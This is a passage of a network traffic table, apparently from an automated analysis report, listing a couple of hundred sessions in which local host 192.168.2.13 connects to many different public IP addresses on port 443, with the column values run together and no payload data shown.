                                        23699192.168.2.134433060.21.40.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23700192.168.2.1335990216.92.109.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23701192.168.2.1335582172.64.110.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23702192.168.2.1355526148.99.166.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23703192.168.2.135339217.157.144.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23704192.168.2.135842464.72.167.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23705192.168.2.1339126179.147.252.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23706192.168.2.133410232.188.8.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23707192.168.2.1356572142.30.38.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23708192.168.2.1342686165.186.24.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23709192.168.2.1342658109.210.147.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23710192.168.2.133711462.66.253.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23711192.168.2.133452045.51.169.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23712192.168.2.1333194148.8.112.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23713192.168.2.135727867.17.32.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23714192.168.2.133541689.150.112.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23715192.168.2.1335438189.168.159.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23716192.168.2.1341046148.220.176.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23717192.168.2.1353756113.175.247.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23718192.168.2.1354966201.117.244.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23719192.168.2.134019425.163.214.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23720192.168.2.1351634108.87.73.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23721192.168.2.134510227.171.200.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23722192.168.2.133714865.49.109.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23723192.168.2.1333186122.90.152.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23724192.168.2.1339844128.124.234.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23725192.168.2.1348638108.191.213.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23726192.168.2.133590676.104.87.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23727192.168.2.135633619.245.198.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23728192.168.2.1340768105.182.196.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23729192.168.2.135171649.109.70.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23730192.168.2.1354334135.135.114.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23731192.168.2.1341556216.41.65.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23732192.168.2.1342252213.120.160.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23733192.168.2.1356210186.120.21.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23734192.168.2.1342984187.96.49.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23735192.168.2.136001683.114.116.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23736192.168.2.1360478210.149.127.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23737192.168.2.1344140177.230.86.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23738192.168.2.135415272.219.72.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23739192.168.2.1358280144.239.47.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23740192.168.2.1337480155.52.78.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23741192.168.2.135012845.71.121.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23742192.168.2.1336194192.35.122.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23743192.168.2.1343580120.89.90.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23744192.168.2.135052268.155.30.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23745192.168.2.1338384146.84.178.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23746192.168.2.1353332174.47.112.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23747192.168.2.1356970207.57.85.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23748192.168.2.1339348142.107.242.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23749192.168.2.133936081.180.149.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23750192.168.2.1337804155.200.16.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23751192.168.2.1342738103.177.55.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23752192.168.2.1343810163.187.123.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23753192.168.2.1339096124.202.241.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23754192.168.2.1355752143.67.65.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23755192.168.2.135817062.111.180.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23756192.168.2.134012443.158.71.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23757192.168.2.1349490168.4.87.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23758192.168.2.1355902196.93.59.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23759192.168.2.1334606139.228.232.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23760192.168.2.1334878202.77.67.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23761192.168.2.1341256128.208.66.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23762192.168.2.1341756188.182.185.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23763192.168.2.133737477.205.37.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23764192.168.2.1337516128.224.134.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23765192.168.2.1349392156.208.211.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23766192.168.2.13449169.223.198.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23767192.168.2.135439820.231.111.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23768192.168.2.1351756161.4.213.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23769192.168.2.1360336203.76.137.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23770192.168.2.135021636.167.21.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23771192.168.2.1334386100.2.210.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23772192.168.2.1353208119.81.23.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23773192.168.2.135914490.186.69.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23774192.168.2.1348628206.129.251.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23775192.168.2.1350196140.95.189.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23776192.168.2.135978239.169.114.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23777192.168.2.1334634171.120.136.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23778192.168.2.1357130152.35.224.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23779192.168.2.134805493.80.144.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23780192.168.2.1356660150.206.119.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23781192.168.2.1359672165.206.174.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23782192.168.2.135755243.53.187.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23783192.168.2.135006667.62.119.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23784192.168.2.135205435.148.228.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23785192.168.2.133429827.226.130.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23786192.168.2.1355178113.219.9.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23787192.168.2.135268464.36.183.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23788192.168.2.135829842.236.68.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23789192.168.2.134343299.135.207.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23790192.168.2.133960698.190.141.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23791192.168.2.13457748.35.102.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23792192.168.2.1339888183.92.28.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23793192.168.2.1352200205.230.108.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23794192.168.2.1352110191.255.225.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23795192.168.2.1333658139.24.217.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23796192.168.2.1336448146.216.236.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23797192.168.2.134776094.123.56.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23798192.168.2.133665078.91.104.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23799192.168.2.135319435.10.171.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23800192.168.2.134889874.161.192.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23801192.168.2.134250697.102.212.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23802192.168.2.1332844195.164.248.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23803192.168.2.1353880133.160.237.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23804192.168.2.134430032.97.192.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23805192.168.2.134486223.63.140.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23806192.168.2.134310265.75.123.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23807192.168.2.1356542134.162.169.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23808192.168.2.13411145.227.148.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23809192.168.2.135942443.56.201.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23810192.168.2.133288827.193.80.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23811192.168.2.1337100135.95.226.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23812192.168.2.1357980103.226.110.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23813192.168.2.1360662129.25.100.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23814192.168.2.135424096.184.136.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23815192.168.2.1342594193.146.250.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23816192.168.2.135783213.103.240.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23817192.168.2.134919434.33.168.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23818192.168.2.1337486111.206.104.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23819192.168.2.1357786112.55.92.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23820192.168.2.1355510173.130.160.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23821192.168.2.135751831.78.75.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23822192.168.2.134535471.253.114.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23823192.168.2.133543263.246.45.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23824192.168.2.135282663.8.6.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23825192.168.2.1344422207.57.112.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23826192.168.2.1353626139.67.67.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23827192.168.2.135286084.73.226.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23828192.168.2.135959013.4.233.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23829192.168.2.1333418200.67.92.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23830192.168.2.1345294157.27.203.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23831192.168.2.133921452.23.59.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23832192.168.2.1357436205.146.180.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23833192.168.2.135404824.2.174.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23834192.168.2.1335476148.247.235.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23835192.168.2.1339372104.217.29.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23836192.168.2.1335396203.34.175.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23837192.168.2.135846878.113.46.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23838192.168.2.1360034193.239.92.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23839192.168.2.1351772155.108.254.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23840192.168.2.1343668171.171.107.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23841192.168.2.134100035.207.132.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23842192.168.2.1348718202.8.93.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23843192.168.2.1337022144.160.106.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23844192.168.2.133858066.211.201.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23845192.168.2.1350816108.158.96.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23846192.168.2.1333364161.117.72.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23847192.168.2.1353796171.237.188.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23848192.168.2.1351010121.248.107.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23849192.168.2.1333740112.223.232.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23850192.168.2.1352414212.24.229.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23851192.168.2.1351924118.52.237.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23852192.168.2.134169265.202.61.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23853192.168.2.1337140112.241.246.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23854192.168.2.135495657.133.91.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23855192.168.2.134585673.80.170.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23856192.168.2.1340052106.16.222.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23857192.168.2.134364035.67.150.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23858192.168.2.135092489.25.30.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23859192.168.2.1338376121.92.212.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23860192.168.2.135511895.255.121.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23861192.168.2.1340562163.73.246.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23862192.168.2.1360168218.63.176.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23863192.168.2.1342184118.44.193.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23864192.168.2.133662212.187.6.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23865192.168.2.134087077.34.210.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23866192.168.2.1359040118.137.14.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23867192.168.2.1344980130.186.234.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23868192.168.2.1334924182.185.124.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23869192.168.2.1345704161.210.157.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23870192.168.2.1351650118.163.119.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23871192.168.2.1349752156.115.150.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23872192.168.2.1357892144.33.65.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23873192.168.2.1353876162.42.248.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23874192.168.2.133783458.67.0.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23875192.168.2.1333804169.40.10.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23876192.168.2.133539095.85.1.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23877192.168.2.1343092193.239.250.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23878192.168.2.134228654.181.21.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23879192.168.2.133397425.239.136.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23880192.168.2.1350094204.248.219.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23881192.168.2.134222425.68.35.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23882192.168.2.133967059.224.68.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23883192.168.2.134860899.237.131.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23884192.168.2.1357618126.220.90.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23885192.168.2.1338038157.175.98.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23886192.168.2.133663669.167.35.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23887192.168.2.136034892.3.112.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23888192.168.2.1337242172.51.147.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23889192.168.2.133785692.243.142.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23890192.168.2.1353748197.145.188.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23891192.168.2.1347436125.95.75.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23892192.168.2.134244435.160.185.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23893192.168.2.1355142177.162.234.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23894192.168.2.1340482107.171.78.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23895192.168.2.135319249.203.77.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23896192.168.2.1335904169.184.10.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23897192.168.2.133998212.84.228.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23898192.168.2.1340450158.113.20.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23899192.168.2.13331102.9.63.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23900192.168.2.1337898124.207.32.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23901192.168.2.135919264.88.89.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23902192.168.2.135561290.214.168.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23903192.168.2.1349044182.245.31.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23904192.168.2.1347410149.58.59.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23905192.168.2.1357602148.138.131.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23906192.168.2.1340180142.204.224.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23907192.168.2.1350546124.193.71.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23908192.168.2.1354550113.150.208.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23909192.168.2.133869814.40.28.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23910192.168.2.135940689.180.106.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23911192.168.2.1343950158.4.233.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23912192.168.2.1359952186.36.229.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23913192.168.2.136075493.25.8.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23914192.168.2.1342994133.66.51.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23915192.168.2.133954657.75.116.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23916192.168.2.1340856207.22.92.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23917192.168.2.134622457.152.34.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23918192.168.2.1359240211.196.47.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23919192.168.2.1335654150.7.178.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23920192.168.2.1333658169.77.59.67443
                                        TimestampBytes transferredDirectionData


